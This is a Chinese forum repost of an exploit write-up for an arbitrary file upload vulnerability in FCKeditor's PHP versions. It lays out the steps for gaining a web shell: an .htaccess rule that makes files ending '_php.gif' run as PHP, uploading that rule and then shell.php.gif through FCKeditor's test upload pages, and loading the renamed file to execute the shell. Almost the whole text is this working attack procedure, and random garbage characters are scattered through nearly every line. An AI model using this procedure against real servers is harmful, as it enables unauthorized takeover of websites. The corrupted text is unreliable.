FCKeditor所有php版本Upload上传漏洞% q+ ~& c) k9 S" h+ R
作者:佚名 来源:本站整理 发布时间:2011-10-25 7:39:07
! \( I+ \4 \$ y减小字体 增大字体
/ H) s0 J I( |2 I3 r[+] Title:FCKeditor all versian Arbitrary File Upload Vulnerability
/ L1 p! m/ T& t& r$ o. Y0 V/ W9 z, x[+] Date: 2011
; S. ^. t: O3 E0 L# d" c[+] Author : sinesafe.cn
2 H2 e) ]' z4 W" K0 g4 e8 h. [[+] Website : WwW.sinesafe.cn& m8 o/ d, H2 t: q* b1 w8 ~
———————————————————
* |5 k) I" a+ G, \. M: A' r/ q1.create a htaccess file:' B, o7 _4 ]$ S! X
code:
4 N( e1 s2 ?& b% v<FilesMatch “_php.gif”>
: i6 [: r5 u: ]SetHandler application/x-httpd-php/ l* A d1 R% b$ _0 q6 f7 k$ Q& _
</FilesMatch>
+ V { G, B# Q+ N0 L1 @/ V# C3 N* j# n
2.Now upload this htaccess with FCKeditor.! N9 l" O2 a) a8 e1 B! W
/ D( T* U) c' ^& A7 }; S% G qhttp://www.sinesafe.cn/FCKeditor ... er/upload/test.html' X* ]- e* c* q3 h& e# y3 y
0 p: \% s1 L/ Z6 A7 a, Q* E
http://www.sinesafe.cn/FCKeditor ... onnectors/test.html7 t3 W k8 m' x! S! D9 @5 u- V' B
6 o3 J0 t+ j; T- w# ?+ u$ N
———————————————————————————————-# X+ {0 v1 A( K2 b6 b
3.Now upload shell.php.gif with FCKeditor.
+ p; i' b$ m0 f# U4.After upload shell.php.gif, the name “shell.php.gif” change to “shell_php.gif” automatically.
& m; o% f$ h W* f5 [4 b' x- k5.http://www.sinesafe.cn/anything/shell_php.gif" J. k- X, d5 x! \7 D% R5 t8 Q
6.Now shell is available from server. |
8 P: c8 w6 p5 x+ V6 F D
1 e: \* r, u6 \+ d+ b; c3 y9 O6 A+ w: F$ e0 J9 |8 ]- }* Y+ D9 }6 s
|
发表于 2013-10-27 17:25:21
收藏
支持
反对